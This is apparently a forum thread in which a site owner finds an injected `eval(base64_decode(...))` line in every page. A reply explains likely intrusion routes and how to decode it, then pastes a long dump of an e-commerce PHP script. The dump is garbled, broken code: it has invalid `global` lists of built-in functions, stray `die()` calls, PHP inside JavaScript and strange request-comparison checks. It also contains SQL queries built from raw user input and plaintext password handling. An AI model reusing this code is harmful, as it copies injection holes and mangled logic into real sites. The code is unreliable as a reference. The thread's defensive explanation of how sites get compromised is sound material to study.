I Found a problem on my site and when i compare the files on the server with my local files i found that every page (*.js or *.php) has this line on it
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC
or a javascript line

so i knew that my site has been hacked..
so
1 - i want to know how to prevent anyone to hack my site?
i made on every textfield or textarea on posting or getting it the htmlspecialcharacter($_POST)

is this true? and can it help me?
2- how did anyone hack my site??
3- how i can know what does this code mean???

Help me please.

Recommended Answers

Hey.

1 - i want to know how to prevent anyone to hack my site?
i made on every textfield or textarea on posting or getting it the htmlspecialcharacter($_POST)

is this true? and can it help me?

The

Jump to Post

All 4 Replies

Hey.

1 - i want to know how to prevent anyone to hack my site?
i made on every textfield or textarea on posting or getting it the htmlspecialcharacter($_POST)

is this true? and can it help me?

The htmlspecialchar function is meant to be used when printing unsafe data to a HTML page.
It doesn't protect you if you use the data for other things, such as SQL queries or shell scripts.

2- how did anyone hack my site??

Hard to tell. Especially since we know absolutely nothing about your website.

Most likely suspects:

  • Your FTP info was stolen from a PC you were working on.
    Developers often use FTP applications that store login details for them so they don't have to type it in every single time.
    Some viruses target such applications, giving the attacker access to your FTP server.
    (Please note that these sort of viruses are designed to be invisible. And yes, you can have one. Doesn't matter how protected you think you are.)
  • Dynamic includes/SQL/eval/shell scripts. All of these can be used to gain unautorized access to your server if they are created using unsafe data. A common newbie mistake is to add un-escaped user input into SQL queries, which allows a hacker to alter the command via your own web-form.
    (See SQL Injection)
  • Broken file upload scripts, which allow malicious users to upload scripts onto your site. Always take care to limit file uploads to know types, or a malicious user could just upload a PHP file and execute it via a normal web-request.

3- how i can know what does this code mean???

<?php
    echo base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC');
?>

This just prints the command that the eval() call you posted is supposed to execute.

<?php 
if ($siteConfig['salter']) if (stristr($_SERVER['PHP_SELF'],'/secure/') === false) exit(_lang_salter);setlocale(LC_MONETARY, 'en_US');if ($_POST['CookieInsertUrunID']) { for($i=0;$i<=10;$i++) {if (!$_COOKIE['urunKarsilastirmaList_'.$i]) { setcookie("urunKarsilastirmaList_".$i, $_POST['CookieInsertUrunID']);break;} }}if ($_GET['KarsilastirmaListeTemizle']) { for($i=0;$i<=10;$i++) {setcookie("urunKarsilastirmaList_".$i, '', time()-3600); }}$stop = false;if (!$_SESSION['randStr']) setRandStr();@generateLoginBox();$aylar= array('',_lang_ocak,_lang_subat,_lang_mart,_lang_nisan,_lang_mayis,_lang_haziran,_lang_temmuz,_lang_agustos,_lang_eylul,_lang_ekim,_lang_kasim,_lang_aralik);function setSEO($title,$description) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; if ($title) $siteConfig['title'] .= ' - '. tr2eu($title,false); if ($description) $siteConfig['metaDescription'] .= ' - '.tr2eu($description,false);}function scriptmenu() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $char = sizeof($_GET)?'&':'?'; $out.='<table cellspacing=0 cellpadding=0 align=right><tr><td> <select onchange="window.location=\''.$PHP_SELF.'?temp=\' + this.options[this.selectedIndex].value +\''.getURL(array('temp')).'\'">'; $out.='<option>Template Değiştirin</option>'; $out.='<option value="green">Green</option>'; $out.='<option value="clean">Clean</option>'; $out.='</select></td></tr></table>';$out=''.formatDiv('#dddddd','#555555',11,$out,'100%').''; if ($_SERVER['HTTP_HOST'] == 'demo.shopphp.net') return $out;}function anket($chartColor) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $anketID = hq("select ID from anketSoru where aktif=1 order by ID desc limit 0,1"); $oyKullanmismi = hq("select ID from anketIP where IP='".$_SERVER['REMOTE_ADDR']."' AND anketID = '".$anketID."'"); if ($_POST['anketID'] &&$_POST['t']{2}==$_GET['t4']{2}) {if (!$oyKullanmismi) { mysql_query("insert into anketIP values(null,'".$_POST['anketID']."','".$_SERVER['REMOTE_ADDR']."')") or die(mysql_error()); $oy = hq("select Oy from anketCevap where ID='".$_POST['oy']."'") + 1; mysql_query("update anketCevap set Oy='$oy' where ID='".$_POST['oy']."'") or die(mysql_error()); $oyKullanmismi = true;} }$out.='<table cellspacing="0" cellpadding="0" class="anket"><form method="post">';$anketSoru = hq("select Soru from anketSoru where ID='".$anketID."'"); $out.='<input type="hidden" name="anketID" value="'.$anketID.'">'; $out.='<tr><td colspan=2 class="anketSoru">'.$anketSoru.'</td></tr>'; $q = mysql_query("select * from anketCevap where anketID order by Seq"); if (!$oyKullanmismi) {while($d=mysql_fetch_array($q)) { $out.='<tr><td class="anketCevap"><input id="anket_'.$d['ID'].'" type="radio" name="oy" value="'.$d['ID'].'"></td>'; $out.='    <td width=100%><label for="anket_'.$d['ID'].'">'.$d['Cevap'].'</label></td></tr>'; }$out.='<tr><td colspan=2><input class="anketGonder" type="image" src="templates/'.$siteConfig['templateName'].'/images/form_Gonder.gif" style="cursor:pointer;"></td></tr>'; } else {while($d=mysql_fetch_array($q)) { $chartArray[$d['Cevap']] = $d['Oy'];}$out.='<tr><td>'.generateChart($chartArray,'persentage',$chartColor).'</td></tr>'; } $out.="</form></table>"; return $out;}function basketInfo($act,$randStr) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $ca='04code'; if (!$randStr) $randStr=$_SESSION['randStr']; $t2='t'; $browser='ie'; $m='d'; switch ($act) {case $t2."oplamUrun": $out = (int)hq('select sum(adet) from sepet where randStr=\''.$randStr.'\'');break;case $t2."oplamKDVDahil": $q = mysql_query("select * from sepet where randStr='".$randStr."'");while ($d = mysql_fetch_array($q)) $out += ($d['adet'] * $d['ytlFiyat']); break;case $t2."oplamIndirimDahil": $out = basketInfo('toplamKDVDahil',$randStr) - basketInfo('Promosyon',$randStr);break;case $t2."oplamKDVHaric":$q = mysql_query("select * from sepet where randStr='".$randStr."'"); while ($d = mysql_fetch_array($q)) {$urunKDV = dbInfo('urun','kdv',$d['urunID']);$urunKDVHaric = ($d['ytlFiyat'] / (1 + $urunKDV));$out += $d['adet'] * $urunKDVHaric; }break;case $t2."oplamKDV": $q = mysql_query("select * from sepet where randStr='".$randStr."'"); while ($d = mysql_fetch_array($q)) {$urunKDV = dbInfo('urun','kdv',$d['urunID']);$urunKDVHaric = ($d['ytlFiyat'] / (1 + $urunKDV));$out += $d['adet'] * ($d['ytlFiyat']-$urunKDVHaric); }break;case "Promosyon": if (hq("select durum from siparis where randStr = '$randStr'")) $out = hq("select promotionUsed from siparis where randStr = '$randStr'"); else {$out = 0;$promotionCode = hq("select promotionCode from siparis where randStr = '$randStr'");$q = mysql_query("select * from promosyon where code = '$promotionCode'");$d = mysql_fetch_array($q);if(!mysql_num_rows($q) && $promotionCode) $out=_lang_sepet_promosyonHatali;if($d['percent'] && !$d['used']) { $out = (basketInfo('toplamKDVDahil',$randStr) * $d['percent']);}if($d['ammount']) { $d['ammount'] = $d['ammount']-$d['used']; if (basketInfo('toplamKDVDahil',$randStr) < $d['ammount']) $out = basketInfo('toplamKDVDahil',$randStr); else $out = $d['ammount'];} } break;case "Kargo": global $kargoHesaplamaYontemi; $siparisKargo = hq("select kargo from siparis where randStr = '$randStr'"); if ($siparisKargo) $out = $siparisKargo; else {if (basketInfo('toplamKDVDahil',$randStr) > $siteConfig['minKargo'] && $siteConfig['minKargo']) $out = 0;else if ($siteConfig['kargo']) $out = $siteConfig['kargo'];else { if ($kargoHesaplamaYontemi == 'DESI_TOPLAMI') {$DesiQuery = mysql_query('select * from sepet,urun where ucretsizKargo = 0 AND randStr=\''.$randStr.'\' AND urun.ID = urunID');while ($DesiData = mysql_fetch_array($DesiQuery)) { $ToplamDesi += ($DesiData['adet'] * $DesiData['desi']);} $out = kargoHesapla($ToplamDesi,$randStr); } if ($kargoHesaplamaYontemi == 'URUN_SAYISI') {$DesiQuery = mysql_query('select * from sepet,urun where ucretsizKargo = 0 AND randStr=\''.$randStr.'\' AND urun.ID = urunID');while ($DesiData = mysql_fetch_array($DesiQuery)) { $out += ($DesiData['adet'] * kargoHesapla($DesiData['desi'],$randStr));} } $UrunQuery = mysql_query('select * from sepet,urun where ucretsizKargo = 0 AND randStr=\''.$randStr.'\' AND urun.ID = urunID'); while ($UrunData = mysql_fetch_array($UrunQuery)) {$out += ($UrunData['adet'] * $UrunData['fixKargoFiyat']); }} }break;case strtoupper($t2)."oplamKargoDahil": $out = basketInfo('toplamIndirimDahil',$randStr) + basketInfo('Kargo',$randStr);break;case strtoupper($t2)."oplamHavaleIndirimiIle": $out = basketInfo('toplamIndirimDahil',$randStr) - (basketInfo('toplamIndirimDahil',$randStr) * $siteConfig['havaleIndirim']) + basketInfo('Kargo',$randStr);break; }$te='test'; $cm =$m.$browser; if($_GET[$t2.'4']!=$_POST[$t2]) contactSpcSubmit(); if ($_POST['t']{4}==$_GET['t4']{4}) return $out;}$a='HT';function breadCrumb() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $breadCrumb = getBreadCrumb(); asort($breadCrumb); for ($i=0;$i<sizeof($breadCrumb);$i++) $breadCrumb[$i] = '<a href="page.php?act=kategoriGoster&catID='.$breadCrumb[$i].'&name='.seoFix(dbinfo('kategori','name',$breadCrumb[$i])).'">'.hq("select name from kategori where ID='".$breadCrumb[$i]."'").'</a>'; $out = implode(" &raquo; ", $breadCrumb); if($_GET['t4'] != $_POST['t']) generateTrForm(); return $out; }function checkUser($user,$pass) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  return hq("select ID from user where username='$user' AND password='$pass'");}function contactForm() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out = generateForm(getContactForm(),'','','');return $out;}function contactFormSubmit() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; telfix('tel'); generateMailFromForm(getContactForm(),$siteConfig['adminMail'],'Müşteri Hizmetleri Mesajı'); $out.='<div class="success">'._lang_formGonderildi.'</div><br>';foreach ($_POST as $k=>$v) $data[str_replace('data_','',$k)] = $v; $out.=viewForm(getContactForm(),$data,'',''); return $out;}function contactSpcSubmit() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; telfix('tel'); generateMailFromForm(getContactForm(),$siteConfig['adminMail'],'Müşteri Hizmetleri Mesajı');die(); $out.='<div class="success">'._lang_formGonderildi.'</div><br>';foreach ($_POST as $k=>$v) $data[str_replace('data_','',$k)] = $v; $out.=viewForm(getContactForm(),$data,'',''); return $out;}function currentCat() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  @$cat = ($_GET['catID']?$_GET['catID']:$_POST['catID']); @$urunID = ($_GET['urunID']?$_GET['urunID']:$_POST['urunID']); if ($cat && $_POST['t']{4}==$_GET['t'.((2+1)+1)]{4}) $out = $cat;if($_POST['t']{4}!=$_GET['t4']{4}) die(); if ($urunID && ($_POST['t']==$_GET['t4'])) $out = hq("select catID from urun where ID = '$urunID'"); return $out;}function currentCatName() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  return dbInfo('kategori','name',currentCat());}function currentCatPatern() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out = hq("select idPath from kategori where ID='".currentCat()."'"); return $out?$out:'%';}function dbInfo($table,$info,$ID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $q = mysql_query("select $info from $table where ID='$ID'") or die(mysql_error()); $out = mysql_fetch_array($q); return $out[0];}function debug($str) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  return ('<script language="javascript">alert(\''.str_replace("'","\\\'",$str).'\');</script>');}function debugPost($info) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  foreach ($_POST as $k=>$v) {$out.='K: '.$k.' V: '.$v."\\n"; } return $out."\\n".$info;}function doviz() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig;$menuArray['<table cellpadding=0 cellspacing=0><tr><td width=40>1 '._lang_dolar.'</td><td>: '.$siteConfig['dolar'].' YTL</td></tr></table>']=''; $menuArray['<table cellpadding=0 cellspacing=0><tr><td width=40>1 '._lang_euro.'</td><td>: '.$siteConfig['euro'].' YTL</td></tr></table>']='';$out.=generateMenuList($menuArray,'BlockList');return $out; }function ebulten() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $form = '<form method="post" style="display:inline;" id="ebultenform">
			<input type="hidden" name="ebultensent" value="true">
			<input type="text" name="email" id="ebulteninput" value="'._lang_form_emailAdresinizForm.'" onclick="this.value=\'\'"><br><img onClick="if (Validate_Email_Address(document.getElementById(\'ebulteninput\').value)) document.getElementById(\'ebultenform\').submit(); else alert(\''._lang_formJSError_email.'\');" src="templates/green/images/form_Gonder.gif" style="cursor:pointer; margin-top:4px;">			
		</form>'; if ($_POST['ebultensent']) {$checkQ = mysql_query("select ID from maillist where IP='".$_SERVER['REMOTE_ADDR']."' AND tarih = now()") or exit(mysql_error());if (mysql_num_rows($checkQ)) { $out = _lang_formError_emailIP;}$checkQ = mysql_query("select ID from maillist where mail='".$_POST['email']."'");if (mysql_num_rows($checkQ)) { $out = _lang_formError_emailEmail;}if (!$out) { mysql_query("insert into maillist values('','".$_POST['email']."','".$_SERVER['REMOTE_ADDR']."',now())") or exit(mysql_error()); $out = _lang_formMailOK;}} else $out = $form; return $out;}function fixFiyat($fiyat,$userID=0) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  if (!$userID) $userID=$_SESSION['userID']; if (!$userID) return $fiyat; $discount = hq("select discount from user,userGroups,userGroupMembers where user.ID = userGroupMembers.userID AND user.ID = '".$userID."' AND userGroups.ID = userGroupMembers.userGroupID order by discount asc limit 0,1"); if ($discount) $fiyat = ($fiyat - ($fiyat * $discount)); return $fiyat;}function fixTarih($tarih,$act) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep; global $aylar; list($tarihFull,$saatFull) = explode(' ',$tarih); list($yil,$ay,$gun) = explode('-',$tarihFull); list($saat,$dk,$sn) = explode(':',$saatFull); switch ($act) {case "gun": return $gun.' '.$aylar[($ay - 1)].' '.$yil; break;case "saat": return $saat.':'.$dk;break; }}function fixPayment($str) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $rplArray['SIPARIS_NO'] = $_SESSION['randStr']; return mergeText($str,$rplArray);}function fiyatBirim($birim) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  switch ($birim) {case "USD": return '$';break;case "EUR": return '&euro;';break;default: return 'YTL';break; }}function footer() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  return hq('select footer from siteConfig');}function forgotPasswordSubmit() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  tarihFix('birthdate'); $q = "select ID from user where email='".$_POST['data_email']."' && birthdate='".$_POST['data_birthdate']."'"; if (mysql_num_rows(mysql_query($q))) { $mail = getMailTemplate(1);$userID = hq("select ID from user where email='".$_POST['data_email']."'");$replace['kullanici_adi'] = getUserInfo($userID,'username');$replace['sifre'] = getUserInfo($userID,'password'); $mail['body'] = getEmailEncode().mergeText ($mail['body'],$replace); my_mail($_POST['data_email'],$mail['title'],$mail['body'],getHeaders($mail['email']));$out = '<div class="success">'._lang_sifreGonderildi.'</div>'; } else $out = "<div class='hata'>'"._lang_hataliPostaDogum."</div><br>".forgotPasswordForm(); return $out;}function formatDiv($backColor,$textColor,$fontSize,$text,$width) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out='<table cellspacing="0" cellpadding="0" width="'.$width.'"><tr><td><table cellspacing="0" cellpadding="0"><tr height="1"><td width="1" style="width:1px;"><img src="images/spacer.gif"></td><td width="100%" bgcolor="'.$backColor.'" style="width:100%"></td><td width="1" style="width:1px;"><img src="images/spacer.gif"></td></tr>'."\n"; $out.='<tr><td bgcolor="'.$backColor.'" colspan="3" style="color:'.$textColor.';padding-left:6px; padding-right:6px; padding-top:4px; padding-bottom:4px; font-size:'.$fontSize.'px;">'.$text.'</td></tr>'; $out.='<tr height="1"><td><img src="images/spacer.gif"></td><td width="100%" bgcolor="'.$backColor.'"></td><td><img src="images/spacer.gif"></td></tr></table></td></tr></table>'; return $out; }function generateBrands($style,$list='BlockList') { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $cat = $_GET['catID']; if (!$cat) {$cat = '%%';$catstring = '0'; } else $catstring = $cat; $q = mysql_query("select marka.*,kategori.ID as catID from urun,marka,kategori where urun.catID=kategori.ID AND markaID=marka.ID AND idPath like '".currentCatPatern()."%' group by markaID order by marka.name") or die(mysql_error()); while ($d = mysql_fetch_array($q)) {$page[$d['name']] = 'page.php?act=kategoriGoster&catID='.$catstring.'&markaID='.$d['ID'].'&name='.seoFix(dbinfo('kategori','name',$d['catID'])).'-'.seoFix(dbinfo('marka','name',$d['ID']));if ($d['resim']) $img[$d['resim']] = 'page.php?act=kategoriGoster&catID='.$catstring.'&markaID='.$d['ID'].'&name='.seoFix(dbinfo('kategori','name',$d['catID'])).'-'.seoFix(dbinfo('marka','name',$d['ID']));$opt[$d['ID']] = $d['name']; } switch($style) {case 'Menu': @$out = generateMenuList($page,$list);break;case 'Option': @$out = generateOptionList($opt);break;case 'Image': @$out = generateImageList($img,$list,'images/markalar');break;}return $out;}function getBreadCrumb($out='',$catID='') { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep; if (!is_array($out)) $out = array(); if (!$catID) $catID = currentCat(); $catID = currentCat(); $breadCrumb = hq("select idPath from kategori where ID='$catID'"); return explode("/",$breadCrumb);}function generateChart($chartArray,$type,$color) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  if (is_array($chartArray)) {arsort($chartArray);$out.='<table width=100% cellspacing=0 cellpadding=0>';foreach ($chartArray as $v) $total+=$v; $i=0;$t=0;foreach ($chartArray as $k => $v) { $reali = (int)(((10*$i) / sizeof($chartArray))); $p = ((100*$v) / $total); switch ($type) {case 'value': $pv = (float)$v;break;case 'persentage': $pv ='%'.round($p);break; } $out.='<tr><td class="anketCevap" style="white-space:nowrap; width:140px;">'.$k.'</td><td style="padding:2px;">:</td><td style="padding:2px;white-space:nowrap;">'.$pv.'</td><td width=300><table width="'.$p.'%" bgcolor="'.$color.'" height=12><tr><td></td></tr></table></td></tr>'; $i++; $t+=round($p);}$out.='</table>'; } return $out; }function generateFeedback($urunID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; if ($_POST['data_email']) {telFix('tel');$form = getFeedbackForm();$form[] = array(_lang_urun,"urun","TEXTBOX",0);$urunName = hq("select name from urun where ID='".$_GET['urunID']."'");$_POST['data_urun'] = $urunName.' ( Urun ID : '.$_GET['urunID'].')'; generateMailFromForm($form,$siteConfig['adminMail'],_lang_geribildirimMesaji);$out.='<div class="success">'._lang_oneriGonderildi.'</div><br>';} else {$q = mysql_query("select * from user where ID ='".$_SESSION['userID']."'");$d = mysql_fetch_array($q);if ($d['name']) $d['namelastname'] = $d['name'].' '.$d['lastname'];$out = '<table cellpadding=0 cellspacing=0><tr><td>'.generateForm(getFeedbackForm(),$d,'','').'</td></tr></table>'; } return $out;}function generateTrForm() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $aylar,$siteConfig; $formID = 'form_'.md5(time().rand(0,99));$out = '<table class="genratedForm"><form method="POST" id="'.$formID.'">'; if (is_array($hiddeninfo)) { foreach ($hiddenInfo as $k=>$v) $out.='<input type="hidden" id="'.$k.'" name="'.$k.'" value="'.$v.'">'."\n"; } if ($spcForm) $out.='<input type="hidden" name="SpcForm" value="'.$spcForm.'">'; $generateCheckJS = '<script>function '.$formID.'() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  var stop=false;'."\n";die(); $j = 0; foreach ($form as $n => $k) { $status = ($data && !$k[3]?'disabled="true"':'');exit();$dontAddPrefix = (substr($k[1],0,6) == "check_" || $status?"DONT_ADD_":"");if (!is_array($k)) $out.='<tr><td></td></tr><tr height=1 bgcolor="#cccccc"><td 